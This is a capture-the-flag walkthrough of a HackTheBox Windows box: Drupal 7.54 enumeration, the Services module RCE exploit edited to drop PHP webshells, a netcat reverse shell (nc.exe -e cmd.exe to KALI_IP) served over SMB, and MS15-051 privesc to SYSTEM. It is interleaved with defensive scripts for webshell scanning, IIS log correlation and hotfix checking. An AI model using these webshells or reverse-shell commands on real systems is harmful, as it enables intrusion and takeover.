A medium box from HackTheBox: a vulnerability in a Drupal module gives initial access, then a kernel exploit handles privesc.


Regular nmap

sudo nmap -sC -sV -oA nmap/init
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to |
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

On port 80 there is a Drupal instance, running Drupal 7.

Next up, gobuster for directories

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url

Nothing interesting turns up immediately, but the presence of /rest/ will be important later.

Then gobuster for files

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url

This finds a /changelog.txt in the webroot, which exposes that the Drupal version is 7.54.

For a more specific scan, run droopescan to enumerate the plugins installed on the server.

droopescan scan drupal -u

This one takes ages to complete, but eventually produces the output below.

[+] Themes found:

[+] Possible interesting urls found:
    Default changelog file -
    Default admin -

[+] Possible version(s):

[+] Plugins found:

[+] Scan finished (0:35:53.627982 elapsed)

Running searchsploit against drupal then shows an exploit for Drupal 7.x and the Services module.

searchsploit drupal 7


Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php



Mirror the exploit into the current directory.

searchsploit -m php/webapps/41564.php

Firing it immediately doesn't work, neither with -h nor when given a target, so read up on it using the writeup link inside the file.

At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”

So inside the file the endpoint variable needs to change from the default “endpoint_path=/rest_endpoint” to the path found during the gobuster enumeration, “endpoint_path=/rest”.

Since the exploit writes a PHP file to the web root, the default file it drops can be swapped for a simpler command webshell.


// the file the exploit ships with: evaluates whatever is POSTed in the request body
$file = [
    'filename' => 'dixuSOspsOUU.php',
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];

// replaced with a webshell that runs the value of the cmd GET parameter
$file = [
    'filename' => 'rev.php',
    'data' => '<?php system($_GET[\'cmd\']); ?>'
];
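From the defender's side, both payload shapes above (eval of the raw request body, and a shell builtin fed straight from a request parameter) are easy to spot on disk. The scanner below is an added example, not code from the writeup or the exploit; it walks a web root looking for PHP files that match those two signatures and builds a throwaway sample web root (constructed files, not the box's) to run against.

```python
import os
import re
import tempfile
from typing import Dict, List

# Signatures for the two payload shapes seen in the Services exploit (regexes constructed
# for this example): eval() of php://input, and a shell builtin fed from a request superglobal.
WEBSHELL_SIGNATURES = {
    "eval-of-request-body": re.compile(
        r"eval\s*\(\s*file_get_contents\s*\(\s*['\"]php://input['\"]", re.I),
    "shell-from-request-param": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
}


def scan_php_file(path: str) -> List[str]:
    """Return the names of every signature that matches the given PHP file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    return [name for name, rx in WEBSHELL_SIGNATURES.items() if rx.search(content)]


def scan_webroot(root: str) -> Dict[str, List[str]]:
    """Walk a web root; map each matching .php/.phtml file (relative path) to its hits."""
    findings: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, fname)
            hits = scan_php_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_webroot() -> str:
    """Create a constructed web root: two benign files plus the two payloads from the writeup."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "dixuSOspsOUU.php": "<?php eval(file_get_contents('php://input')); ?>",
        "rev.php": "<?php system($_GET['cmd']); ?>",
        os.path.join("sites", "default", "settings.php"): "<?php $databases = []; ?>",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for rel, hits in sorted(scan_webroot(sample_root).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Pattern matching of this kind is a triage aid rather than a complete control; the real fix for the Services issue is updating the module, and a file-integrity baseline of the web root would catch a dropped file whatever its contents.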

Then change the target URL within the file as well.

$url = 'http://IP';   // base URL of the target Drupal site

Then fire the exploit with

php 41564.php

Now with the webshell in place, the Windows build of netcat, nc.exe, can be used to get a reverse shell.

Copy nc.exe to the working directory, then serve it with impacket's smbserver script so the target can reach it through the webshell.

/opt/impacket/examples/smbserver.py share .

Then set up a netcat listener on port 4444 and run \\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444 through the webshell's cmd parameter.

That catches the reverse shell, and the user flag can be read from there.
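Everything up to this point leaves a trail in the IIS logs: a write-style request to the Services REST endpoint, followed shortly by a request for a .php file that Drupal never shipped, with a cmd= query string. The detection below is an added example (not part of the writeup) that parses W3C-format IIS log lines and correlates those two events per client IP; the log excerpt is constructed for illustration, with 10.10.14.2 playing the attacker and the server IP chosen arbitrarily.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed IIS W3C log excerpt (not logs from the box); the #Fields line is the
# default IIS 7.5 layout. Spaces inside fields are written as '+' by IIS, so splitting on
# whitespace is safe.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.10.10.9 GET / - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 120
2024-01-01 10:00:05 10.10.10.9 GET /CHANGELOG.txt - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 15
2024-01-01 10:00:09 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 300
2024-01-01 10:00:10 10.10.10.9 GET /rev.php cmd=whoami 80 - 10.10.14.2 Mozilla/5.0 200 0 0 45
2024-01-01 10:00:30 10.10.10.9 GET /index.php q=node/1 80 - 10.10.14.7 Mozilla/5.0 200 0 0 80
2024-01-01 10:02:00 10.10.10.9 GET /test.php - 80 - 10.10.14.7 Mozilla/5.0 404 0 2 5
"""

# PHP files Drupal 7 legitimately serves from the web root; any other .php hit is worth a look.
KNOWN_PHP_ENTRYPOINTS = {"/index.php", "/cron.php", "/update.php", "/install.php",
                         "/authorize.php", "/xmlrpc.php"}
REST_PREFIX = "/rest/"                 # the Services endpoint path found during enumeration
CORRELATION_WINDOW = timedelta(minutes=5)


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines into dicts keyed by the names on the #Fields line."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or not fields:
            continue
        else:
            parts = line.split()
            if len(parts) == len(fields):      # skip truncated or malformed lines
                rows.append(dict(zip(fields, parts)))
    return rows


def find_alerts(rows: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Flag requests for unexpected .php files; raise the severity when the same client
    sent a non-GET request to the REST endpoint shortly before. Returns (c-ip, reason, request)."""
    rest_writes: Dict[str, List[datetime]] = defaultdict(list)
    alerts: List[Tuple[str, str, str]] = []
    for r in rows:
        ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
        stem = r["cs-uri-stem"].lower()
        method = r["cs-method"].upper()
        ip = r["c-ip"]
        if stem.startswith(REST_PREFIX) and method != "GET":
            rest_writes[ip].append(ts)
            continue
        if stem.endswith(".php") and stem not in KNOWN_PHP_ENTRYPOINTS:
            request = f"{method} {r['cs-uri-stem']}?{r['cs-uri-query']}"
            recent = any(timedelta(0) <= ts - w <= CORRELATION_WINDOW for w in rest_writes[ip])
            reason = "php-drop-after-rest-write" if recent else "unexpected-php"
            alerts.append((ip, reason, request))
    return alerts


if __name__ == "__main__":
    for ip, reason, request in find_alerts(parse_iis_log(SAMPLE_LOG)):
        print(f"{ip}\t{reason}\t{request}")
```

A POST to the REST endpoint on its own is normal traffic for a site that uses the Services module, which is why the rule only escalates when it is followed by a request for a PHP file outside the known entry points; the lower-severity "unexpected-php" hits are still worth reviewing, since a 404 there often means someone is probing for a dropped file.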

Now on the box, running systeminfo shows that no hotfixes have been applied, so a kernel exploit should be easy.
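The "no hotfixes" observation is exactly what a patch-compliance check should catch before an attacker does. As an added example (not from the writeup), the snippet below parses the Hotfix(s) section of systeminfo output and reports which bulletins from a required list are missing. Both systeminfo excerpts are constructed, as are the KB9xxxxxx numbers; the MS15-051 to KB3045171 mapping is the one this example assumes and should be confirmed against the Microsoft bulletin before relying on it.

```python
import re
from typing import Dict, List, Set

# Constructed systeminfo excerpts (not output captured from the box); the layout follows
# what systeminfo prints on the Server 2008 R2 generation that ships IIS 7.5.
PATCHED_HOST = """Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB9000001
                           [02]: KB3045171
                           [03]: KB9000002
Network Card(s):           1 NIC(s) Installed.
"""

UNPATCHED_HOST = """Host Name:                 WEB02
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Bulletin -> KB mapping the check enforces. The MS15-051 entry is an assumption of this
# example; verify it against the bulletin and extend the dict for your own baseline.
REQUIRED_KBS: Dict[str, str] = {"MS15-051": "KB3045171"}


def parse_hotfixes(systeminfo_text: str) -> List[str]:
    """Return the KB identifiers listed under Hotfix(s), or [] when the section reads N/A."""
    hotfixes: List[str] = []
    in_section = False
    for line in systeminfo_text.splitlines():
        if line.startswith("Hotfix(s):"):
            in_section = True
            if "N/A" in line:
                return []
            continue
        if in_section:
            m = re.search(r"\[\d+\]:\s*(KB\d+)", line)
            if m:
                hotfixes.append(m.group(1))
            else:
                break                # first line without an [NN]: index ends the section
    return hotfixes


def missing_bulletins(systeminfo_text: str, required: Dict[str, str] = REQUIRED_KBS) -> Set[str]:
    """Bulletins whose KB does not appear in the host's installed hotfix list."""
    installed = set(parse_hotfixes(systeminfo_text))
    return {bulletin for bulletin, kb in required.items() if kb not in installed}


if __name__ == "__main__":
    for name, text in (("WEB01", PATCHED_HOST), ("WEB02", UNPATCHED_HOST)):
        print(f"{name}: installed={parse_hotfixes(text)} missing={sorted(missing_bulletins(text))}")
```

Feeding this the saved systeminfo output from a fleet of hosts gives a quick list of which ones still expose a privilege-escalation path that has had a public exploit available for years.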

I'll opt for MS15-051, since it's easy and has a ready-made executable on GitHub.

Transferring it to the victim via the SMB server again, run it with cmd.exe as the command argument; the spawned shell runs as nt authority\system, which is root!

C:\inetpub\drupal-7.54> exploit.exe cmd.exe

C:\inetpub\drupal-7.54> whoami
nt authority\system